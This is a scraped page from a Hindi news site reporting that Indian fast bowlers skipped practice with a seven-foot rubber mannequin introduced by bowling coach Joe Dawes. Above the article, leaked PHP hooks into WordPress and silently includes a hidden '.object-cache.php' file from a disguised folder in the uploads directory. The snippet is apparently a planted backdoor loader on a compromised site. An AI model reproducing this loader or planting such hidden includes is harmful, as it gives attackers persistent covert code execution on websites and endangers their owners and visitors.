add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); भारतीय तेज गेंदबाजों ने पुतले के साथ नहीं किया अभ्यास – SOCH INDIA
Menu

खेल
भारतीय तेज गेंदबाजों ने पुतले के साथ नहीं किया अभ्यास

nobanner

भारत के गेंदबाजी कोच जो डावेस को कोचिंग में अलग तरह की प्रणाली के इस्तेमाल के लिए पिछले कुछ समय से आलोचनाओं का सामना करना पड़ रहा है। भारतीय गेंदबाजों ने ऐसे में सोमवार को श्रीलंका के खिलाफ होने वाले अभ्यास मैच से पूर्व रविवार को सात फुट के पुतले की मौजूदगी में अभ्यास नहीं किया।

किसी भी भारतीय गेंदबाज ने सात फुट के पुतले की मौजूदगी में अभ्यास नहीं किया जिन्हें आज यहां खान साहेब ओस्मानी स्टेडियम की मुख्य पिचों में से एक पर विशेष रूप से तेज गेंदबाजों के लिए रखा गया था।

लाल और काले रंग का यह पुतला कथित तौर पर मुलायम रबड़ का बना हुआ है और इसे ऑस्ट्रेलिया से आयात किया गया है जो डावेस का वतन है। ट्रेनिंग सत्र के दौरान इसके इस्तेमाल का मुख्य लक्ष्य तेज गेंदबाजों को विशिष्ट क्षेत्र में गेंदबाजी का अभ्यास कराना है जैसे कि बाउंसर या यार्कर फेंकना या ऑफ स्टंप के बाहर निश्चित जगह पर गेंदबाजी करना।